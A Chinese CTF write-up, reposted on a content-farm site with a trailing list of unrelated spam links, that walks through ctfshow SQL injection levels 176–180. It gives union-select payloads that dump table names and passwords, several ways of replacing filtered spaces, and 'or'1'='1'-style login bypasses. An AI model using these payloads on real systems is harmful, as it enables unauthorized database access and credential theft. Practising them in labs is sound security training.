当前位置: 首页 > wzjs >正文

织梦网站更改视频推广方案模板

wzjs 2025/8/24 15:44:31
织梦网站更改,视频推广方案模板,网页图片保存,视频拍摄脚本模板web入门176 对传入参数进行了过滤 字段数是3 过滤了查询的单词,我们试试大小写绕过 ok发现是select被过滤 查库名: 查表名:-1 union selEct 1,2,group_concat(table_name) from information_schema.tables where table_schemadatabase() --…
web入门176

对传入参数进行了过滤

字段数是3

过滤了查询的单词,我们试试大小写绕过

ok发现是select被过滤

查库名:

查表名:-1' union selEct 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+

查列名:-1' union selEct 1,2,group_concat(column_name) from information_schema.columns where table_name='ctfshow_user' --+

那就password:1' union Select 1,2, group_concat(password) from ctfshow_user where username='flag'--+

web入门177

经过几次测试,发现' --+类型的既不报错也不回显

这样是可以的

因为--+中的+是空格的意思,所以是过滤了空格,那我们就用/**/代替

字段数:

-1'order/**/by/**/3%23(最后面的'要使用url编码)

库:-1'union/**/select/**/1,2,database()%23

表:-1'union/**/select/**/1,2,group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database()%23

然后就都是一样的,至于替换空格的方式,还有%0a(换行符)%09(Tab)%0b(垂直制表符)

flag:-1'union%09select%0a1,2,password%0Afrom%0bctfshow_user%23

web入门178

通过以上可以得出,还是过滤了空格,然后把/**/也过滤了

然后就是老样子

-1'union%0bselect%0b1,2,group_concat(table_name)%0afrom%0Ainformation_schema.tables%09where%09table_schema=database()%23

-1'union%09select%0a1,2,password%0Afrom%0bctfshow_user%0bwhere%0busername='flag'%23

web入门179

测试发现%09,%0a,%0b和%0d(回车)都不行

但%0c(换页)可以

然后就老样子:

1'union%0cselect%0c1,2,group_concat(table_name)%0cfrom%0cinformation_schema.tables%0cwhere%0ctable_schema=database()%23

以下方法也可以:

-1'union%0cselect%0c1,2,group_concat(password)%0cfrom%0cctfshow_user%23

-1'union(select(select(group_concat(password))from(ctfshow_user)),1,2)%23

'or(1=1)%23

'||1=1%23

'or'1'='1'%23

web入门180

非常奇怪,这里最后面直接'可以了

-1'union%0cselect%0c1,2,database()'

然后后面又不行了

这里可以用--%0c

-1'union%0cselect%0c1,2,table_name%0cfrom%0cinformation_schema.tables%0cwhere%0ctable_schema=database()--%0c

-1'union%0cselect%0c1,2,password%0cfrom%0cctfshow_user%0cwhere%0cusername='flag'--%0c

当然,还有其他的方法:'or'1'='1'--%0c

'or(username)='flag

'||username='flag

先通过第一个'闭合前面的,再用第二个闭合后面的(废话)

如:

SELECT * FROM users WHERE username = '$username' AND password = '$password';

加上就变成

SELECT * FROM users WHERE username = '' OR (username) = 'flag' AND password = '';

OR 条件会使得即使密码为空,只要存在一个 username 包含 "flag" 的记录,查询就会返回结果

http://www.dtcms.com/wzjs/470042.html

相关文章:

  • 武清区网站开发营销推广策略
  • 中关村手机官网首页厦门网站seo
  • 阜阳微网站建设多少钱整站优化多少钱
  • wordpress中文企业主题下载宁波seo外包服务商
  • 免费做思维导图的网站合肥网络公司seo
  • 做户型图的网站在百度上做广告推广要多少钱
  • 做网站代理好吗搜百度盘
  • 做网站国外网站西安小程序开发的公司
  • 建设行政主管部门官方网站怎么制作一个自己的网站
  • cdr 做网站页面电商代运营
  • 石家庄网站制作招聘sem是什么牌子
  • 网站建设和维护委托合同福州360手机端seo
  • 新开传奇最大网站999大数据培训课程
  • wordpress前台注册登入网站seo谷歌
  • 现在 做网站 技术路线seo 推广
  • 国内优秀网页网站全国疫情防控最新数据
  • 建设企业网站的万能的搜索引擎
  • 东宁做木耳招工人网站公司官网模板
  • php网站建设方案seo营销推广多少钱
  • 个人单页网站建设网站推广优化排名seo
  • 做彩票网站犯法吗学管理培训班去哪里学
  • 网站开发制作费用任务放单平台
  • 如何做网站数据库备份网站设计与建设的公司
  • 网络设计与实现毕业论文seo好学吗
  • 做网站 用哪种网络营销的推广手段
  • 太原网站制作建设新榜数据平台
  • 小程序开发视频教程seo平台优化服务
  • 上海软件公司有哪些东莞百度seo在哪里
  • 百度网网页版登录seo关键词优化怎么收费
  • 山西太原做网站成人技能培训机构